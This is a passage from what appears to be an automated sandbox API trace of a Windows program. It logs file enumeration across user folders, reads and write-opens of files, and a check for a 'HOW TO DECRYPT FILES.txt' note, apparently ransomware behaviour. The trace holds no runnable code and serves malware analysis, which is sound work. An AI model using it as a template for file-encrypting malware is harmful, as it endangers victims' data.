lpFindFileData=0x3ae268*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0040.127] FindClose (in: hFindFile=0x4061c8 | out: hFindFile=0x4061c8) returned 1 [0040.127] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae4f0) returned 1 [0040.127] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae4fc) returned 1 [0040.127] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae530) returned 1 [0040.127] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private", nBufferLength=0x105, lpBuffer=0x3ae038, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private", lpFilePart=0x0) returned 0x3a [0040.127] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\", nBufferLength=0x105, lpBuffer=0x3ae00c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\", lpFilePart=0x0) returned 0x3b [0040.127] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\*", lpFindFileData=0x3ae258 | out: lpFindFileData=0x3ae258*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4061c8 [0040.127] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae268 | out: lpFindFileData=0x3ae268*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0040.128] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae268 | out: lpFindFileData=0x3ae268*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebf97a0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x74e6, dwReserved0=0x0, dwReserved1=0x0, cFileName="folder.ico", cAlternateFileName="")) returned 1 [0040.128] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae268 | out: lpFindFileData=0x3ae268*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebf97a0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x74e6, dwReserved0=0x0, dwReserved1=0x0, cFileName="folder.ico", cAlternateFileName="")) returned 0 [0040.128] FindClose (in: hFindFile=0x4061c8 | out: hFindFile=0x4061c8) returned 1 [0040.128] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae4f0) returned 1 [0040.128] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae4fc) returned 1 [0040.128] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\folder.ico", nBufferLength=0x105, lpBuffer=0x3adee0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\folder.ico", lpFilePart=0x0) returned 0x45 [0040.128] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae3d4) returned 1 [0040.128] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\folder.ico" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\_private\\folder.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0040.129] GetFileType (hFile=0x26c) returned 0x1 [0040.129] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae3d0) returned 1 [0040.130] GetFileType (hFile=0x26c) returned 0x1 [0040.130] GetFileSize (in: hFile=0x26c, lpFileSizeHigh=0x3ae4dc | out: lpFileSizeHigh=0x3ae4dc*=0x0) returned 0x74e6 [0040.130] ReadFile (in: hFile=0x26c, lpBuffer=0x24f98a0, nNumberOfBytesToRead=0x74e6, lpNumberOfBytesRead=0x3ae488, lpOverlapped=0x0 | out: lpBuffer=0x24f98a0*, lpNumberOfBytesRead=0x3ae488*=0x74e6, lpOverlapped=0x0) returned 1 [0040.133] CloseHandle (hObject=0x26c) returned 1 [0040.176] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", nBufferLength=0x105, lpBuffer=0x3adff4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", lpFilePart=0x0) returned 0x3e [0040.176] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae454) returned 1 [0040.176] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\how to decrypt files.txt"), fInfoLevelId=0x0, lpFileInformation=0x3ae4d0 | out: lpFileInformation=0x3ae4d0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0040.176] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae450) returned 1 [0040.176] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\folder.ico", nBufferLength=0x105, lpBuffer=0x3adecc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\folder.ico", lpFilePart=0x0) returned 0x45 [0040.176] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae3c0) returned 1 [0040.176] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\folder.ico" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\_private\\folder.ico"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0040.178] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ad1f8) returned 1 [0040.178] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae5a4) returned 1 [0040.178] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos", nBufferLength=0x105, lpBuffer=0x3ae0ac, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos", lpFilePart=0x0) returned 0x31 [0040.178] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\", nBufferLength=0x105, lpBuffer=0x3ae080, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\", lpFilePart=0x0) returned 0x32 [0040.178] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\*", lpFindFileData=0x3ae2cc | out: lpFindFileData=0x3ae2cc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0040.178] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae568) returned 1 [0040.180] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae5a4) returned 1 [0040.180] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files", nBufferLength=0x105, lpBuffer=0x3ae0ac, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files", lpFilePart=0x0) returned 0x35 [0040.180] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\", nBufferLength=0x105, lpBuffer=0x3ae080, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\", lpFilePart=0x0) returned 0x36 [0040.180] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\*", lpFindFileData=0x3ae2cc | out: lpFindFileData=0x3ae2cc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a7a9f80, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x5c4f8e60, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x5c4f8e60, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x406108 [0040.180] FindNextFileW (in: hFindFile=0x406108, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a7a9f80, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x5c4f8e60, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x5c4f8e60, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0040.180] FindNextFileW (in: hFindFile=0x406108, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5a868660, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x5a868660, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x6228cf40, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x42400, dwReserved0=0x0, dwReserved1=0x0, cFileName="voeimd@djhreuu.uhd.pst", cAlternateFileName="VOEIMD~1.PST")) returned 1 [0040.181] FindNextFileW (in: hFindFile=0x406108, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0040.181] FindClose (in: hFindFile=0x406108 | out: hFindFile=0x406108) returned 1 [0040.181] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae564) returned 1 [0040.181] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae570) returned 1 [0040.181] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae5a4) returned 1 [0040.181] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files", nBufferLength=0x105, lpBuffer=0x3ae0ac, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files", lpFilePart=0x0) returned 0x35 [0040.181] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\", nBufferLength=0x105, lpBuffer=0x3ae080, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\", lpFilePart=0x0) returned 0x36 [0040.181] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\*", lpFindFileData=0x3ae2cc | out: lpFindFileData=0x3ae2cc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a7a9f80, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x5c4f8e60, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x5c4f8e60, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x406108 [0040.181] FindNextFileW (in: hFindFile=0x406108, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a7a9f80, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x5c4f8e60, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x5c4f8e60, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0040.182] FindNextFileW (in: hFindFile=0x406108, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5a868660, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x5a868660, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x6228cf40, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x42400, dwReserved0=0x0, dwReserved1=0x0, cFileName="voeimd@djhreuu.uhd.pst", cAlternateFileName="VOEIMD~1.PST")) returned 1 [0040.182] FindNextFileW (in: hFindFile=0x406108, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5a868660, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x5a868660, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x6228cf40, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x42400, dwReserved0=0x0, dwReserved1=0x0, cFileName="voeimd@djhreuu.uhd.pst", cAlternateFileName="VOEIMD~1.PST")) returned 0 [0040.182] FindClose (in: hFindFile=0x406108 | out: hFindFile=0x406108) returned 1 [0040.182] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae564) returned 1 [0040.182] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae570) returned 1 [0040.182] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae618) returned 1 [0040.182] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads", nBufferLength=0x105, lpBuffer=0x3ae120, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads", lpFilePart=0x0) returned 0x27 [0040.182] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\", nBufferLength=0x105, lpBuffer=0x3ae0f4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\", lpFilePart=0x0) returned 0x28 [0040.182] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\*", lpFindFileData=0x3ae340 | out: lpFindFileData=0x3ae340*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x406108 [0040.183] FindNextFileW (in: hFindFile=0x406108, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0040.183] FindNextFileW (in: hFindFile=0x406108, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0040.183] FindNextFileW (in: hFindFile=0x406108, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0040.183] FindClose (in: hFindFile=0x406108 | out: hFindFile=0x406108) returned 1 [0040.183] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae5d8) returned 1 [0040.183] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae5e4) returned 1 [0040.183] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae618) returned 1 [0040.183] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads", nBufferLength=0x105, lpBuffer=0x3ae120, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads", lpFilePart=0x0) returned 0x27 [0040.183] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\", nBufferLength=0x105, lpBuffer=0x3ae0f4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\", lpFilePart=0x0) returned 0x28 [0040.183] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\*", lpFindFileData=0x3ae340 | out: lpFindFileData=0x3ae340*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x406108 [0040.183] FindNextFileW (in: hFindFile=0x406108, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0040.184] FindNextFileW (in: hFindFile=0x406108, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0040.184] FindNextFileW (in: hFindFile=0x406108, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0040.184] FindClose (in: hFindFile=0x406108 | out: hFindFile=0x406108) returned 1 [0040.184] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae5d8) returned 1 [0040.184] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae5e4) returned 1 [0040.184] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae618) returned 1 [0040.184] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures", nBufferLength=0x105, lpBuffer=0x3ae120, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures", lpFilePart=0x0) returned 0x26 [0040.184] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", nBufferLength=0x105, lpBuffer=0x3ae0f4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpFilePart=0x0) returned 0x27 [0040.184] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\*", lpFindFileData=0x3ae340 | out: lpFindFileData=0x3ae340*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x17fcc320, ftLastAccessTime.dwHighDateTime=0x1d53803, ftLastWriteTime.dwLowDateTime=0x17fcc320, ftLastWriteTime.dwHighDateTime=0x1d53803, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x406108 [0040.185] FindNextFileW (in: hFindFile=0x406108, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x17fcc320, ftLastAccessTime.dwHighDateTime=0x1d53803, ftLastWriteTime.dwLowDateTime=0x17fcc320, ftLastWriteTime.dwHighDateTime=0x1d53803, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0040.185] FindNextFileW (in: hFindFile=0x406108, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdaa82e10, ftCreationTime.dwHighDateTime=0x1d4cac5, ftLastAccessTime.dwLowDateTime=0x563101c0, ftLastAccessTime.dwHighDateTime=0x1d4c7b4, ftLastWriteTime.dwLowDateTime=0x563101c0, ftLastWriteTime.dwHighDateTime=0x1d4c7b4, nFileSizeHigh=0x0, nFileSizeLow=0xa85, dwReserved0=0x0, dwReserved1=0x0, cFileName="-n5DmWUWZemNfRxNv.gif", cAlternateFileName="-N5DMW~1.GIF")) returned 1 [0040.185] FindNextFileW (in: hFindFile=0x406108, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd15de270, ftCreationTime.dwHighDateTime=0x1d4cca8, ftLastAccessTime.dwLowDateTime=0x3377a0e0, ftLastAccessTime.dwHighDateTime=0x1d4cd76, ftLastWriteTime.dwLowDateTime=0x3377a0e0, ftLastWriteTime.dwHighDateTime=0x1d4cd76, nFileSizeHigh=0x0, nFileSizeLow=0x15d2c, dwReserved0=0x0, dwReserved1=0x0, cFileName="2-kRBk0S.jpg", cAlternateFileName="")) returned 1 [0040.185] FindNextFileW (in: hFindFile=0x406108, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99a4a6f0, ftCreationTime.dwHighDateTime=0x1d4cc7d, ftLastAccessTime.dwLowDateTime=0x39bb60, ftLastAccessTime.dwHighDateTime=0x1d4d11c, ftLastWriteTime.dwLowDateTime=0x39bb60, ftLastWriteTime.dwHighDateTime=0x1d4d11c, nFileSizeHigh=0x0, nFileSizeLow=0x19ee, dwReserved0=0x0, dwReserved1=0x0, cFileName="aOKaoV.jpg", cAlternateFileName="")) returned 1 [0040.185] FindNextFileW (in: hFindFile=0x406108, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0040.185] FindNextFileW (in: hFindFile=0x406108, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfa386f20, ftCreationTime.dwHighDateTime=0x1d4cb7d, ftLastAccessTime.dwLowDateTime=0x51e9faa0, ftLastAccessTime.dwHighDateTime=0x1d4d4d8, ftLastWriteTime.dwLowDateTime=0x51e9faa0, ftLastWriteTime.dwHighDateTime=0x1d4d4d8, nFileSizeHigh=0x0, nFileSizeLow=0xcc63, dwReserved0=0x0, dwReserved1=0x0, cFileName="GHzQiL.bmp", cAlternateFileName="")) returned 1 [0040.185] FindNextFileW (in: hFindFile=0x406108, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x25b1a090, ftCreationTime.dwHighDateTime=0x1d4d31c, ftLastAccessTime.dwLowDateTime=0x8e1cede0, ftLastAccessTime.dwHighDateTime=0x1d4d544, 